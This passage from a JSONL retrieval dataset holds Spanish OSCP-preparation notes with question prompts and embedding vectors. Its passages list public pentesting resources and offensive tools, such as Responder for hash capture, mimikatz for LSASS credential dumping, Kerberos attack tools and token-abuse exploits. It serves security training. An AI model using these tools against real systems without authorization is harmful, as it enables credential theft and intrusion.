detalladΓ­simos y pedagΓ³gicos |\n| **PayloadsAllTheThings** | Cheatsheet de todo lo web (SQL injection, LFI a RCE, uploads) |\n| **HackTricks** (book.hacktricks.xyz) | La biblia: lo busques lo que busques, estΓ‘ |\n| **GTFOBins / LOLBAS** | Privesc Linux y LOLBins Windows β†’ GTFOBins y LOLBAS |\n| **/r/oscp** | Experiencias de examinados (sin spoilers) |\n| **Discords pΓΊblicos**: HTB, TryHackMe, NetSecFocus | Comunidades que SÍ puedes consultar |\n| **noraj/OSCP-Exam-Report-Template-Markdown** | Plantilla del Reporte OSCP |\n\n> Compilado de cultura pΓΊblica (TJ Null, ippsec, 0xdf, Heath Adams, /r/oscp, HackTricks, foros HTB). **No** es material bajo NDA de OffSec.\n\nRelacionado: un laboratorio Β· OSCP MOC", "indexar": "que recursos pΓΊblicos puedo usar para practicar la metodologΓ­a OSCP sin secretos?", "v": [0.04021, -0.00648, -0.10682, -0.2584, 0.02966, -0.18837, -0.03901, -0.06542, -0.0028, -0.0683, 0.01141, 0.03616, 0.09892, -0.03884, -0.01607, -0.05962, 0.1401, 0.02124, 0.02224, -0.02549, -0.03874, -0.185, -0.08424, 0.07922, 0.05425, 0.09959, 0.08987, -0.11286, -0.03664, -0.11795, -0.09217, 0.14945, 0.00286, -0.03514, -0.08388, 0.09514, -0.01547, -0.06771, -0.04335, 0.04998, -0.0286, -0.00299, -0.01216, 0.10192, 0.1038, 0.04836, 0.00654, 0.01107, -0.15593, 0.01885, -0.12067, -0.14354, -0.12808, -0.08603, -0.10568, -0.12501, 0.01521, -0.03071, -0.12517, -0.04336, -0.04282, 0.00901, 0.00064, -0.00578, 0.04497, -0.06729, 0.04896, 0.04857, -0.18729, 0.03929, 0.03906, 0.08928, -0.03, 0.0041, -0.02181, 0.00513, 0.04319, -0.03983, 0.10226, -0.00218, -0.0814, -0.01395, -0.03729, 0.04996, -0.14809, -0.05889, 0.14651, -0.02385, 0.04571, -0.14215, -0.01162, 0.02222, -0.02504, -0.06923, 0.03666, -0.08291, 0.0345, 0.03343, -0.02204, 0.06101, 0.08361, 0.03669, -0.07828, 0.06894, 0.01299, 0.04482, 0.0586, -0.03677, 0.00801, -0.02711, -0.05671, 0.03002, -0.07899, 0.06944, -0.02668, -0.02546, 0.10595, 0.00886, -0.09323, -0.03652, -0.10042, -0.03008, -0.0704, -0.03086, 0.07958, -0.03424, 0.0466, 0.0594, 0.06262, 0.09062, 0.0214, -0.0206, -0.00014, 0.09903, -0.0041, -0.03744, -0.0609, -0.03522, -0.03007, -0.03654, 0.05871, -0.02739, -0.06843, -0.07634, 0.02076, -0.07934, 0.07163, -0.09299, -0.04322, -0.07581, 0.07884, -0.09343, 0.00306, 0.02653, 0.0011, -0.04459, 0.04753, -0.02632, -0.10754, 0.052, -0.04084, 0.02743, -0.02352, -0.00218, 0.01426, -0.03606, -0.02412, 0.00294, -0.03201, 0.05213, 0.06264, 0.05913, 0.02434, -0.00369, 0.08727, -0.0676, -0.01049, -0.02892, 0.0135, 0.01874, -0.06745, 0.01421, -0.04569, -0.02393, 0.03099, -0.00454, 0.00276, -0.03233, -0.02538, 0.03619, -0.03449, -0.07416, 0.05114, -0.02257, -0.01376, -0.04499, 0.0467, -0.00995, 0.02895, -0.00892, -0.02136, 0.01932, -0.04643, -0.03648, 0.06079, -0.01726, -0.02871, 0.01829, -0.03929, 0.01556, 0.08425, -0.06233, 0.06133, -0.03961, 0.01457, 0.03941, -0.04664, -0.00044, -0.07283, 0.00297, 0.05059, 0.05203, 0.04922, 0.00073, 0.11505, 0.03162, -0.0273, -0.04527, -0.00398, 0.02592, -0.0247, 0.05634, -0.03241, -0.01337, 0.0373, 0.0148, -0.00311, -0.00325, 0.00316, -0.03232, -0.00972, 0.02253, -0.00327, -0.0305, -0.00052, -0.04493, -0.05253, -0.02746, 0.029, -0.0349, 0.07116, -0.00656, 0.04798, -0.01747, -0.0016, -0.04955]} +{"tipo": "pregunta", "herramienta": "Recursos pΓΊblicos", "perfil": "PENTESTERS", "fichero": "conocimiento/07 - Referencia/Recursos pΓΊblicos.md", "tema": "referencia", "fuente": null, "licencia": null, "texto": "# Recursos pΓΊblicos\n\n> DΓ³nde estΓ‘ SÍ todo esto (cultura pΓΊblica, nada bajo NDA). Apoyo para MetodologΓ­a OSCP y el Reporte OSCP.\n\n| Recurso | Por quΓ© importa |\n|---|---|\n| **TJ Null's OSCP-like list** (Reddit) | MΓ‘quinas HTB/THM equivalentes a OSCP, actualizada |\n| **ippsec.rocks** | Buscador de writeups por tΓ©cnica (\"kerberoasting\" β†’ te lista las mΓ‘quinas) |\n| **0xdf.gitlab.io** | Writeups detalladΓ­simos y pedagΓ³gicos |\n| **PayloadsAllTheThings** | Cheatsheet de todo lo web (SQL injection, LFI a RCE, uploads) |\n| **HackTricks** (book.hacktricks.xyz) | La biblia: lo busques lo que busques, estΓ‘ |\n| **GTFOBins / LOLBAS** | Privesc Linux y LOLBins Windows β†’ GTFOBins y LOLBAS |\n| **/r/oscp** | Experiencias de examinados (sin spoilers) |\n| **Discords pΓΊblicos**: HTB, TryHackMe, NetSecFocus | Comunidades que SÍ puedes consultar |\n| **noraj/OSCP-Exam-Report-Template-Markdown** | Plantilla del Reporte OSCP |\n\n> Compilado de cultura pΓΊblica (TJ Null, ippsec, 0xdf, Heath Adams, /r/oscp, HackTricks, foros HTB). **No** es material bajo NDA de OffSec.\n\nRelacionado: un laboratorio Β· OSCP MOC", "indexar": "con que herramienta busco una lista de mΓ‘quinas tipo HTB para OSCP actualizada?", "v": [0.01078, -0.0734, -0.09918, -0.0791, -0.03656, -0.25351, -0.09091, 0.06503, -0.04315, 0.00313, -0.09727, -0.05452, 0.03607, 0.08163, 0.03389, -0.03685, -0.04761, -0.13309, 0.03159, -0.0177, 0.00151, 0.05193, -0.16212, 0.12319, 0.03029, 0.00966, -0.03976, -0.09908, -0.3585, 0.03205, 0.09121, -0.00207, -0.06527, 0.0459, -0.06306, -0.1012, -0.05986, 0.01571, -0.02014, 0.03797, 0.04636, 0.02387, -0.01838, 0.05563, 0.12226, -0.03294, 0.0963, 0.05346, -0.01529, -0.00054, -0.10541, -0.16605, -0.12285, 0.00111, -0.04137, -0.21551, 0.07014, 0.01499, 0.02975, -0.12531, -0.06089, 0.02766, -0.14775, -0.08574, -0.05336, 0.04388, -0.00455, -0.0816, -0.07754, 0.0306, -0.06366, 0.04934, 0.06708, 0.00446, 0.05879, -0.01597, 0.11597, 0.05961, 0.11739, -0.00665, -0.00415, -0.0332, -0.06068, 0.09349, -0.07647, -0.069, 0.14717, 0.0356, -0.00102, -0.08173, 0.01279, 0.08981, 0.01975, 0.06287, 0.08397, -0.06918, 0.06841, 0.01187, 0.01856, -0.02383, 0.07231, 0.00756, -0.03544, 0.06935, -0.10375, 0.00589, 0.04604, -0.0122, 0.00522, 9e-05, 0.05138, 0.04027, 0.02635, 0.01271, -0.05151, 0.02215, -0.07286, 0.00929, 0.00793, -0.08315, -0.05831, 0.08795, -0.01933, -0.03483, 0.10039, -0.00649, -0.02065, 0.07746, -0.03249, -0.08987, 0.00408, -0.034, -0.09584, -0.02992, -0.03408, -0.03068, 0.01024, -0.06694, 0.00543, -0.07839, 0.00278, 0.0913, 0.01901, -0.06627, 0.01213, -0.03188, 0.02687, -0.04962, -0.03637, -0.01663, 0.04648, -0.02055, 0.02377, 0.06491, -0.01935, 0.05436, 0.00269, 0.01101, -0.05728, 0.03841, -0.02838, -0.05589, -0.04861, 0.02174, -0.03961, 0.0424, 0.02329, 0.06208, 0.06339, -0.02204, -0.00011, 0.05255, 0.06028, 0.02731, -0.03694, -0.0314, 0.00863, 0.03045, 0.00589, 0.00589, -0.06239, 0.05721, 0.00749, -0.04727, -0.00615, -0.06154, 0.0515, -0.07605, 0.04344, -0.01134, -0.00046, 0.02085, -0.01397, -0.05587, 0.06663, 0.00243, 0.03564, 0.02836, 0.03019, -0.04418, -0.08494, -0.07043, -0.08281, -0.03163, -0.02179, 0.06138, 0.01283, -0.00494, -0.01676, -0.02406, 0.03885, 0.03227, 0.02924, -0.03079, 0.01311, 0.02656, -0.002, 0.0376, 0.01482, 0.01418, 0.02088, -0.0363, 0.02957, -0.01785, -0.06078, -0.01871, 0.0284, 0.03484, 0.05209, -0.01993, 0.04565, 0.04888, 0.0433, -0.07309, 0.04758, 0.02516, 0.01836, -0.03805, -0.08104, -0.03837, -0.00447, -0.00152, -0.01871, -0.01977, -0.03395, -0.03262, 0.01229, -0.03355, -0.01255, -0.05425, -0.03929, 0.00806, 0.02445, -0.06839, 0.03868, 0.02189]} +{"tipo": "pregunta", "herramienta": "Recursos pΓΊblicos", "perfil": "PENTESTERS", "fichero": "conocimiento/07 - Referencia/Recursos pΓΊblicos.md", "tema": "referencia", "fuente": null, "licencia": null, "texto": "# Recursos pΓΊblicos\n\n> DΓ³nde estΓ‘ SÍ todo esto (cultura pΓΊblica, nada bajo NDA). Apoyo para MetodologΓ­a OSCP y el Reporte OSCP.\n\n| Recurso | Por quΓ© importa |\n|---|---|\n| **TJ Null's OSCP-like list** (Reddit) | MΓ‘quinas HTB/THM equivalentes a OSCP, actualizada |\n| **ippsec.rocks** | Buscador de writeups por tΓ©cnica (\"kerberoasting\" β†’ te lista las mΓ‘quinas) |\n| **0xdf.gitlab.io** | Writeups detalladΓ­simos y pedagΓ³gicos |\n| **PayloadsAllTheThings** | Cheatsheet de todo lo web (SQL injection, LFI a RCE, uploads) |\n| **HackTricks** (book.hacktricks.xyz) | La biblia: lo busques lo que busques, estΓ‘ |\n| **GTFOBins / LOLBAS** | Privesc Linux y LOLBins Windows β†’ GTFOBins y LOLBAS |\n| **/r/oscp** | Experiencias de examinados (sin spoilers) |\n| **Discords pΓΊblicos**: HTB, TryHackMe, NetSecFocus | Comunidades que SÍ puedes consultar |\n| **noraj/OSCP-Exam-Report-Template-Markdown** | Plantilla del Reporte OSCP |\n\n> Compilado de cultura pΓΊblica (TJ Null, ippsec, 0xdf, Heath Adams, /r/oscp, HackTricks, foros HTB). **No** es material bajo NDA de OffSec.\n\nRelacionado: un laboratorio Β· OSCP MOC", "indexar": "dΓ³nde encuentro writeups detallados sobre tΓ©cnicas como Kerberoasting o SQL Injection para OSCP?", "v": [-0.11805, -0.12285, -0.06552, -0.11846, 0.01324, -0.42343, -0.02527, -0.01005, 0.02048, 0.03279, -0.16846, -0.07257, 0.01075, -0.08583, 0.03001, 0.02124, -0.00255, -0.02803, 0.07093, 0.01475, -0.0278, 0.03532, -0.06991, 0.0452, -0.04082, -0.05576, -0.02441, -0.01464, -0.03534, -0.11573, -0.03111, 0.05464, -0.12949, 0.08496, -0.00993, -0.00916, -0.0466, -0.03327, -0.12033, 0.02144, -0.13139, -0.05643, -0.08063, 0.10183, 0.14368, -0.08673, 0.10385, 0.14784, -0.01867, -0.07576, -0.04198, 0.0062, -0.10735, -0.07506, -0.02157, -0.04995, 0.08533, 0.00558, 0.07387, 0.05622, -0.03101, 0.00632, -0.10765, -0.074, 0.06071, -0.09473, 0.00959, -0.00094, 0.01381, 0.06921, -0.08985, 0.05577, 0.00118, -0.04758, 0.08867, 0.02595, 0.08515, 0.14698, 0.05822, -0.05664, -0.06383, -0.02484, -0.09046, 0.13597, -0.02299, -0.04294, 0.1497, -0.02608, -0.06599, -0.10299, 0.05268, -0.01794, 0.03121, -0.00854, -0.0658, -0.11205, -0.03551, -0.02005, -0.03048, 0.05365, -0.0784, 0.04943, -0.04041, 0.02547, -0.08208, 0.02377, 0.05692, 0.02059, 0.0105, -0.13286, 0.05652, 0.07853, 0.00321, -0.01111, -0.08162, -0.054, 0.06867, 0.01141, 0.02411, 0.03463, -0.06918, 0.04691, 0.0015, -0.05536, 0.01265, -0.0099, -0.00479, 0.03854, 0.01849, 0.00237, -0.04149, -0.00091, -0.08878, -0.05431, 0.03927, 0.0392, -0.00485, -0.01197, -0.09445, -0.02565, -0.03681, 0.01111, 0.0032, -0.0538, -0.08236, -0.04514, 0.00268, -0.0256, -0.08757, -0.02625, 0.04364, 0.027, -0.03098, 0.03005, 0.01144, -0.15097, 0.00985, -0.02935, -0.08717, 0.08238, 0.00512, 0.01806, -0.03277, -0.00778, 0.00898, 0.04927, -0.05733, -0.0274, 0.00057, -0.02545, -0.0334, 0.01711, 0.05209, -0.0231, -0.00854, 0.03117, 0.05751, -0.05478, -0.01014, -0.06648, 0.0204, -0.04087, 0.01181, -0.03732, 0.00638, 0.02753, 0.02217, -0.0212, 0.04624, -0.01115, 0.02187, -0.03669, 0.06214, -0.05471, -0.04684, -0.0605, -0.00525, -0.066, 0.02574, -0.00199, -0.06712, -0.03769, 0.00755, -0.02885, 0.01181, 0.02988, -0.03719, 0.0006, -0.04832, -0.06234, -0.02174, -0.02148, 0.04985, -0.01436, -0.00373, -0.03742, -0.03334, -0.02632, -0.00254, 0.02479, 0.00499, 0.02299, 0.05216, -0.02508, 0.06188, -0.09311, 0.01105, 0.00367, -0.01156, 0.09291, 0.00791, 0.03332, 0.01879, -0.00723, 0.04978, 0.06343, -0.02635, 0.00995, 0.01337, -0.02041, 0.06511, 0.03504, 0.05711, -0.0373, 0.01124, -0.03607, -0.10228, -0.03744, -0.00987, 0.01428, -0.00782, -0.06469, 0.05, -0.04676, -0.00249, -0.05233]} +{"tipo": "pregunta", "herramienta": "Herramientas (Γ­ndice)", "perfil": "PENTESTERS", "fichero": "conocimiento/07 - Referencia/Herramientas (Γ­ndice).md", "tema": "referencia", "fuente": null, "licencia": null, "texto": "## En Kali (corren en tu atacante)\n| Tool | Para quΓ© | Nota |\n|---|---|---|\n| Impacket | suite de protocolos Windows | Impacket |\n| NetExec / CrackMapExec | barrido y post-explotaciΓ³n AD | SMB, Pass-the-Hash |\n| BloodHound | grafo de AD | BloodHound |\n| Responder | envenena LLMNR/NBT-NS/MDNS β†’ captura hashes | Client-side attacks |\n| Evil-WinRM | shell WinRM (5985) | Movimiento lateral |\n| ligolo-ng / chisel | pivoting/tΓΊnel | Pivoting ligolo-ng, Tunneling |\n| Kerbrute | enum de usuarios + spraying Kerberos | AS-REP Roasting |\n| Rubeus | operaciones con tickets Kerberos | Kerberoasting, Silver Ticket |\n| hashcat / john | cracking offline | Cracking de contraseΓ±as |", "indexar": "que herramienta sirve para capturar hashes envenenando el LLMNR?", "v": [-0.02608, -0.10285, -0.04619, -0.13789, 0.04632, -0.09154, -0.10742, 0.09123, -0.02029, 0.03327, -0.05693, -0.09031, 0.06792, -0.08095, 0.0581, 0.21223, -0.07572, -0.05373, -0.09512, 0.03883, -0.13719, 0.12031, -0.19267, -0.05073, -0.06681, -0.0991, 0.07689, -0.04059, -0.25461, -0.00696, -0.10815, 0.01056, -0.03695, 0.11373, -0.0626, -0.07262, -0.0201, 0.09106, -0.04217, 0.19351, 0.11573, 0.17728, -0.06635, 0.01993, 0.01486, -0.09021, -0.02377, 0.00782, 0.03053, -0.02002, 0.03678, 0.03571, -0.16838, -0.06652, -0.0648, -0.06516, 0.10527, -0.04812, 0.01351, -0.11069, -0.0954, -0.07555, -0.05275, -0.10125, -0.01168, -0.00844, 0.00316, -0.03684, -0.03253, 0.00471, 0.01637, 0.11434, 0.10063, 0.01376, -0.04372, 0.02368, 0.01354, 0.01875, 0.08169, 0.02446, 0.02247, -0.09522, -0.0547, -0.03372, -0.03122, 0.05862, 0.09532, -0.03817, 0.00762, -0.07209, -0.03003, 0.11459, 0.03503, 0.00107, 0.07137, -0.0156, 0.01467, -0.07191, 0.00271, -0.00955, 0.07579, -0.10526, -0.09262, 0.05192, -0.0885, 0.01746, 0.02006, 0.01588, -0.04957, 0.08832, 0.05366, -0.00275, -0.00134, 0.04374, -0.04741, 0.08227, 0.02403, -0.06969, 0.022, -0.05477, 0.02374, 0.02863, -0.02898, -0.05065, 0.03314, -0.01118, -0.0582, 0.03023, 0.0245, -0.09041, 0.01529, -0.00908, -0.06872, 0.0897, -0.00855, -0.0412, 0.13141, -0.07264, -0.06445, -0.10745, -0.0049, 0.01913, -0.05452, -0.12944, 0.01997, 0.04069, 0.07253, -0.00065, -0.0075, -0.0123, 0.08785, -0.09079, -0.00766, -0.03697, 0.00153, 0.03339, -0.00068, -0.02344, -0.15595, 0.0505, -0.01336, -0.02444, 0.04679, 0.01474, 0.00642, -0.10549, 0.02143, -0.07074, 0.02154, 0.03813, 0.03632, -0.06903, 0.04359, -0.07312, 0.02847, -0.04155, -0.04791, 0.03596, 0.0018, -0.08927, -0.03247, 0.03175, 0.06348, -0.03305, 0.05264, -0.01583, 0.02812, -0.00678, -0.02295, -0.01613, -0.05591, -0.01838, -0.00135, -0.03713, 0.00079, -0.04629, 0.04562, 0.0267, 0.07561, -0.00209, 0.01702, -0.0063, 0.02114, -0.02414, 0.02948, 0.01358, -0.02387, -0.03142, 0.01943, -0.01866, -0.03792, 0.06738, 0.05409, -0.04696, 0.03189, -0.02429, 0.01646, 0.05675, 0.00082, 0.01926, 0.003, 0.005, 0.04169, 0.07809, -0.02481, 0.01743, 0.00154, 0.01598, 0.02046, -0.05726, 0.055, -0.0422, -0.02954, 0.02893, -0.02751, -0.0599, -0.01263, 0.01284, -0.0593, -0.03871, -0.02955, -0.00641, -0.02247, -0.0113, -0.01275, -0.00564, 0.01792, -0.00047, 0.0113, -0.0366, -0.019, 0.02093, 0.03087, 0.01574, -0.02609, -0.00072]} +{"tipo": "pregunta", "herramienta": "Herramientas (Γ­ndice)", "perfil": "PENTESTERS", "fichero": "conocimiento/07 - Referencia/Herramientas (Γ­ndice).md", "tema": "referencia", "fuente": null, "licencia": null, "texto": "## En Kali (corren en tu atacante)\n| Tool | Para quΓ© | Nota |\n|---|---|---|\n| Impacket | suite de protocolos Windows | Impacket |\n| NetExec / CrackMapExec | barrido y post-explotaciΓ³n AD | SMB, Pass-the-Hash |\n| BloodHound | grafo de AD | BloodHound |\n| Responder | envenena LLMNR/NBT-NS/MDNS β†’ captura hashes | Client-side attacks |\n| Evil-WinRM | shell WinRM (5985) | Movimiento lateral |\n| ligolo-ng / chisel | pivoting/tΓΊnel | Pivoting ligolo-ng, Tunneling |\n| Kerbrute | enum de usuarios + spraying Kerberos | AS-REP Roasting |\n| Rubeus | operaciones con tickets Kerberos | Kerberoasting, Silver Ticket |\n| hashcat / john | cracking offline | Cracking de contraseΓ±as |", "indexar": "con quΓ© programa puedo hacer una post-explotaciΓ³n en dominios Active Directory?", "v": [0.05499, 0.07365, -0.03428, -0.13934, 0.01786, 0.00355, 0.11897, 0.028, -0.20453, 0.02289, 0.05176, -0.13004, -0.05712, -0.14436, -0.00159, -0.09495, 0.19071, -0.05677, -0.0904, -0.00848, -0.0874, 0.02412, -0.01612, 0.05365, 0.06934, -0.03409, -0.01399, -0.11609, -0.01546, 0.06722, 0.02716, 0.01239, 0.02195, -0.08359, 0.07362, -0.05724, -0.04354, -0.02329, 0.12636, 0.027, -0.00942, -0.02396, -0.16749, 0.02271, -0.002, 0.0308, -0.01031, -0.19085, -0.01276, -0.07528, -0.04318, -0.05156, -0.04012, -0.07079, 0.16238, -0.04896, 0.02643, -0.0895, -0.10779, 0.01994, 0.00031, -0.06134, 0.0067, -0.06225, -0.0443, -0.07708, 0.14307, 0.03209, -0.03935, 0.12509, 0.04353, 0.03761, 0.01381, 0.08964, 0.07799, 0.00325, 0.05307, -0.03977, -0.04723, -0.04372, -0.00394, -0.00662, 0.02585, 0.04814, -0.0858, -0.1683, -0.0546, -0.10488, -0.01163, -0.11041, 0.09111, 0.05707, -0.08061, -0.00701, 0.02802, -0.03787, 0.10477, 0.0673, 0.03661, 0.04785, 0.01587, 0.07644, -0.07062, 0.10906, 0.09967, 0.13679, 0.03836, -0.03883, -0.0687, 0.06418, -0.04203, -0.10661, -0.0509, -0.1239, -0.0399, 0.12746, -0.18557, -0.03864, 0.04308, -0.01234, -0.11968, -0.01148, 0.04194, 0.04945, 0.10013, -0.05977, -0.03244, 0.08053, -0.02615, 0.00331, 0.00136, 0.03388, -0.00372, -0.06847, 0.00072, -0.07328, 0.03264, 0.02356, -0.02231, -0.10993, -0.02811, 0.00557, 0.01064, 0.02077, 0.0014, -0.03695, 0.02503, -0.10973, -0.00105, -0.01377, 0.0256, -0.04514, -0.02897, 0.0461, 0.03346, 0.03191, -0.00448, 0.00446, -0.01077, 0.0719, -0.00291, -0.02031, -0.08441, 0.01077, 0.02793, 0.03016, -0.01573, -0.0443, 0.01368, 0.11769, -0.08848, 0.07633, 0.04767, -0.03771, 0.00618, -0.00244, -0.01033, 0.03147, 0.08916, -0.04593, -0.03011, 0.02556, -0.00117, 0.04002, -0.03785, 0.04576, 0.00643, -0.01101, -0.0163, -0.00231, 0.08096, 0.07334, 0.03088, 0.01565, -0.02837, -0.08237, 0.00058, 0.03024, 0.00291, -0.05638, 0.0013, 0.00454, 0.00911, -0.02147, 0.02664, 0.02661, -0.04946, 0.09181, 0.0242, 0.04349, -0.05225, -0.04956, 0.08517, -0.02967, -0.11158, 0.0273, 0.01859, 0.00782, 0.0009, -0.00243, -0.03491, 0.04708, 0.01888, 0.00313, 0.04978, -0.00374, 0.06046, 0.01632, 0.04342, 0.06523, -0.05443, -0.01303, -0.04054, -0.02258, 0.02648, 0.00644, 0.00919, -0.04003, -0.04296, -0.01058, -0.02494, 0.05698, 0.03004, 0.02071, -0.04781, -0.04958, -0.04077, 0.04731, 0.00655, -0.0342, -0.02629, 0.01648, 0.03467, -0.07822, -0.00767, 0.00313]} +{"tipo": "pregunta", "herramienta": "Herramientas (Γ­ndice)", "perfil": "PENTESTERS", "fichero": "conocimiento/07 - Referencia/Herramientas (Γ­ndice).md", "tema": "referencia", "fuente": null, "licencia": null, "texto": "## En Kali (corren en tu atacante)\n| Tool | Para quΓ© | Nota |\n|---|---|---|\n| Impacket | suite de protocolos Windows | Impacket |\n| NetExec / CrackMapExec | barrido y post-explotaciΓ³n AD | SMB, Pass-the-Hash |\n| BloodHound | grafo de AD | BloodHound |\n| Responder | envenena LLMNR/NBT-NS/MDNS β†’ captura hashes | Client-side attacks |\n| Evil-WinRM | shell WinRM (5985) | Movimiento lateral |\n| ligolo-ng / chisel | pivoting/tΓΊnel | Pivoting ligolo-ng, Tunneling |\n| Kerbrute | enum de usuarios + spraying Kerberos | AS-REP Roasting |\n| Rubeus | operaciones con tickets Kerberos | Kerberoasting, Silver Ticket |\n| hashcat / john | cracking offline | Cracking de contraseΓ±as |", "indexar": "cual es una alternativa libre a BloodHound para mapear un grafo de dominio?", "v": [-0.17174, -0.03434, 0.02914, -0.03429, -0.17538, 0.03085, 0.05317, -0.02476, -0.08894, 0.01481, 0.00606, -0.20009, -0.02681, -0.00388, 0.03142, -0.01741, 0.06705, -0.05337, 0.01458, -0.0735, -0.13119, 0.03744, -0.08161, -0.07379, -0.11023, -0.15175, 0.02907, 0.00467, -0.09374, 0.07507, 0.0225, -0.09777, 0.02475, -0.08103, -0.11619, -0.0941, 0.11408, 0.0394, 0.08903, 0.07119, 0.0051, -0.12338, -0.06025, 0.03413, -0.08151, -0.06502, -0.06841, 0.05488, 0.05809, 0.00931, 0.02149, -0.01668, -0.16112, -0.03683, 0.05906, 0.00407, 0.07307, -0.22022, -0.02765, -0.05692, -0.0395, -0.01356, -0.01038, -0.03168, -0.00093, -0.04859, 0.00149, 0.04811, 0.00069, 0.13011, 0.06423, 0.07554, 0.00642, 0.0411, -0.01389, -0.05079, -0.02675, -0.09041, 0.13336, 0.03679, 0.06027, 0.03246, -0.0855, 0.0299, -0.09762, -0.06735, -0.00453, -0.06139, 0.0632, 0.11573, 0.03465, 0.02604, -0.08294, 0.12441, -0.02427, -0.09166, 0.00681, -0.00571, -0.01401, -0.04441, 0.10591, 0.13718, -0.2058, -0.00065, 0.11006, -0.00844, -0.07531, 0.0469, -0.08715, 0.06265, 0.06769, 0.0595, -0.08193, 0.0965, -0.01681, -0.03465, 0.10187, 0.11103, 0.06664, -0.06226, -0.06738, 0.01138, 0.02412, -0.01059, -0.07293, 0.02794, -0.02603, 0.01058, -0.01506, -0.02202, -0.00965, 0.05086, -0.06475, -0.1308, -0.15428, 0.07859, 0.03792, -0.00547, 0.02919, 0.00515, -0.06779, 0.00253, -0.00541, 0.00075, -0.03975, -0.01464, 0.05952, -0.09257, -0.04165, -0.01463, -0.10413, 0.02069, -0.00483, 0.06783, 0.01167, 0.04042, -0.06099, -0.00172, -0.07815, 0.04378, -0.05459, -0.04108, -0.02191, 0.05472, -0.04487, 0.07198, -0.00064, 0.06321, -0.08384, 0.01042, 0.00382, 0.06724, 0.02855, -0.02102, 0.04171, -0.0379, -0.01083, -0.09176, -0.05308, 0.03982, 0.03948, -0.04364, -0.02337, 0.10756, -0.00673, 0.02405, 0.08388, 0.00843, 0.04218, -0.01342, -0.01276, 0.09262, -0.01823, 0.00229, -0.00723, -0.02955, 0.11052, -0.01511, -0.06415, -0.01266, -0.0175, -0.04296, -0.03574, 0.03518, -0.01209, 0.03501, 0.00986, 0.00609, -0.00642, 0.01013, -0.04699, 0.02876, 0.01573, 0.00474, -0.0073, 0.03114, 0.00354, -0.01162, -0.01894, -0.06258, 0.01228, 0.04858, -0.02913, 0.00437, -0.03293, 0.0271, 0.01357, -0.00345, 0.03059, -0.04183, 0.04068, 0.04459, -0.01809, 0.05067, -0.03393, 0.04156, 0.03975, -0.0018, 0.03055, -0.02388, 0.05426, 0.04941, -0.01645, -0.01854, -0.03944, -0.07143, -0.03944, -0.0355, -0.02732, -0.03545, 0.00183, -0.01104, 0.04269, 0.04315, 0.02265, 0.03352]} +{"tipo": "pregunta", "herramienta": "Herramientas (Γ­ndice)", "perfil": "PENTESTERS", "fichero": "conocimiento/07 - Referencia/Herramientas (Γ­ndice).md", "tema": "referencia", "fuente": null, "licencia": null, "texto": "## Las que SUBES a la vΓ­ctima Windows\n| Tool | Para quΓ© | Nota |\n|---|---|---|\n| winPEAS | enumeraciΓ³n de privesc | PEASS-ng |\n| PowerUp / PrivescCheck / Sherlock | privesc PowerShell | Privesc Windows |\n| mimikatz | volcar credenciales de LSASS | Mimikatz |\n| SysInternals (accesschk, PsExec) | permisos, ejecuciΓ³n | Privesc Windows |\n| Nishang | PowerShell ofensivo (shells) | Reverse shell |\n| Potato (God/Print/Juicy) | abuso de token β†’ SYSTEM | Potato attacks |", "indexar": "que herramienta sirve para sacar credenciales de LSASS en Windows?", "v": [-0.09292, -0.05705, -0.16485, -0.10083, 0.0215, -0.21132, -0.06863, -0.16298, -0.00686, 0.09088, -0.11213, -0.10333, -0.04676, -0.14169, 0.0895, 0.10253, -0.02099, -0.09225, -0.01896, 0.133, 0.03154, -0.05317, -0.1737, -0.047, -0.04528, 0.01169, 0.03543, -0.11539, -0.17904, 0.11374, -0.07802, 0.05275, -0.09536, -0.06018, -0.01634, -0.04605, -0.17984, 0.12623, 0.05452, 0.12427, 0.05808, 0.17048, -0.0355, 0.00278, 0.04397, -0.04524, 0.01139, 0.02273, 0.02184, 0.03856, -0.05922, -0.14164, -0.05229, 0.00792, -0.01088, -0.1164, 0.12831, -0.08025, -0.05988, -0.05176, -0.11094, 0.03265, -0.06878, 0.0118, 0.00228, -0.06793, 0.05449, -0.11452, 0.05544, 0.04115, -0.11239, 0.0553, 0.11896, -0.00648, -0.06775, -0.03711, -0.00405, 0.06904, 0.11497, -0.03968, 0.13008, -0.01641, -0.03747, -0.00707, 0.01398, -0.09585, 0.02168, -0.03909, 0.00642, -0.1034, 0.02859, 0.06776, -0.06846, 0.07367, 0.01573, -0.00582, 0.04288, 0.01065, 0.04529, 0.03004, 0.06152, -0.17948, -0.04555, 0.06242, -0.08342, 0.0567, 0.01325, -0.05384, -0.12609, -0.0298, 0.05277, 0.0492, -0.02242, 0.01607, -0.03522, 0.08423, -0.04517, -0.06949, 0.03155, 0.02198, 0.03948, -0.02658, -0.00327, -0.05464, -0.01223, -0.01181, -0.11952, 0.06612, -0.06892, -0.02433, 0.00398, -0.00828, -0.05842, 0.0528, -0.02305, -0.00376, -0.00106, -0.09254, -0.01999, -0.05296, 0.06555, 0.0768, 0.01503, -0.10017, 0.01946, 0.01623, 0.04506, 0.00977, 0.01937, -0.07854, 0.04145, -0.01769, -0.01682, 0.02414, -0.05525, 0.0042, 0.03287, 0.07947, -0.03435, 0.02621, -0.03275, -0.02462, 0.07803, 0.00421, -0.01521, -0.02871, 0.02215, -0.00574, 0.07443, 0.02422, 0.03603, 0.00277, 0.0037, -0.01637, 0.03623, -0.03531, 0.02188, 0.00652, -0.03831, -0.05203, -0.04659, 0.00217, -0.03152, 0.00425, -0.01648, 0.0273, -0.0452, -0.0165, -0.05149, -0.01181, -0.0367, -0.00367, 0.02171, -0.06112, 0.0172, 0.00784, 0.00803, -0.06802, 0.05491, 0.01522, -0.1005, 0.00105, -0.01608, -0.0517, 0.08247, 0.08703, 0.0115, 0.03652, 0.01095, 0.05605, 0.00934, -0.05379, 0.03058, -0.05003, -0.04857, -0.05153, 0.03151, 0.03359, -0.04867, -0.00241, 0.02718, -0.00442, 0.03789, -0.01256, -0.01331, -0.00462, -0.04218, -0.00188, -0.01297, -0.00116, 0.01572, 0.04707, -0.00723, -0.02138, 0.03029, -0.02456, 0.03753, -0.02661, -0.02698, -0.04894, -0.026, 0.02186, -0.01958, -0.05239, -0.06792, -0.03224, -0.00429, -0.0111, 0.00899, -0.06221, 0.0005, -0.01849, 0.05525, -0.02585, 0.00507, 0.02462]} +{"tipo": "pregunta", "herramienta": "Herramientas (Γ­ndice)", "perfil": "PENTESTERS", "fichero": "conocimiento/07 - Referencia/Herramientas (Γ­ndice).md", "tema": "referencia", "fuente": null, "licencia": null, "texto": "## Las que SUBES a la vΓ­ctima Windows\n| Tool | Para quΓ© | Nota |\n|---|---|---|\n| winPEAS | 